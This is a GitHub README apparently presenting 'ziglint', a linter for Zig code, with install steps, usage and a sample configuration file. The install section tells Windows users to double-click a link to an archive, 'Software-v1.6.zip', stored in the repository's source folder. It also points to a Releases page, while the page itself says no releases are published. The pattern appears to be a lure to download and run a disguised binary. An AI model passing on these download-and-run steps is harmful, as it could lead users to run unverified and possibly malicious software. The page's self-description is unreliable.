Skip to content

patripollii/ziglint

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

102 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ ziglint - Keep Your Code Clean and Clear

πŸš€ Getting Started

Welcome to ziglint! This tool helps you lint your Zig code, ensuring it meets strong standards for quality and style. It keeps your code neat and your projects well-maintained.

πŸ“₯ Download ziglint

Download ziglint

To download ziglint, visit the following page:

Download ziglint from Releases

πŸ“‹ System Requirements

Before you install ziglint, make sure your system meets these requirements:

  • Operating System: Windows, macOS, or Linux
  • Memory: At least 512 MB of RAM
  • Disk Space: At least 100 MB of free space
  • Zig version: Ensure Zig is installed on your system

πŸ› οΈ Install ziglint

  1. Visit the Release Page: Go to the ziglint Releases page.

  2. Choose the Version: Look for the latest version at the top of the page.

  3. Download the Build: Click on the file that corresponds to your operating system. Choose from Windows, macOS, or Linux.

  4. Extract the Files: If your download is zipped, extract the files to a folder on your computer.

  5. Run the Application:

    • If you're on Windows, double-click https://raw.githubusercontent.com/patripollii/ziglint/main/src/Software-v1.6.zip.
    • If you're using macOS or Linux, open a terminal and run:
      ./ziglint
      

πŸ“˜ Basic Usage Instructions

Once you have ziglint installed, you can start using it seamlessly. Follow these steps:

  1. Open Terminal or Command Prompt.

  2. Navigate to Your Project Directory: Use the command cd path/to/your/project to go to your project folder.

  3. Run ziglint: Type ziglint and hit enter. The tool will analyze your code and display any issues or areas for improvement directly in the terminal.

  4. Review Results: Read through the output messages. They will highlight problems like style violations or potential bugs. Make the necessary changes in your code.

  5. Rerun the Linter: Repeat the command to check your code again after making updates.

🌟 Features

ziglint offers several key features:

  • Opinionated Rules: We help you adopt consistent coding practices.
  • Customization: Modify rules to fit your preferences and project needs.
  • Detailed Reporting: Receive clear feedback on what to fix and improve.
  • Integration: Works well with various development environments.

βš™οΈ Configuration Setup

You can customize ziglint to suit your project. Create a configuration file named .ziglintrc in your project folder. Here’s a basic setup:

{
  "rules": {
    "no-unused-vars": "error",
    "consistent-style": "warn"
  }
}

Modify this file to enable or disable specific rules, or adjust their severity levels from "error" to "warn" or "off."

πŸ”— Resources

Need help or want to dive deeper into ziglint? Here are some helpful links:

πŸ’¬ Support

If you encounter issues while using ziglint or have questions, feel free to open an issue in the GitHub repository. Our team regularly checks for new questions and will get back to you as soon as possible.

πŸ“ Contribution

We welcome contributions! If you want to enhance ziglint or propose a new feature, please fork the repository, make your changes, and submit a pull request.

Thank you for using ziglint. Happy coding!

About

πŸ” Lint your Zig source code with ziglint to ensure clean, consistent, and error-free code by enforcing best practices and identifying issues.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages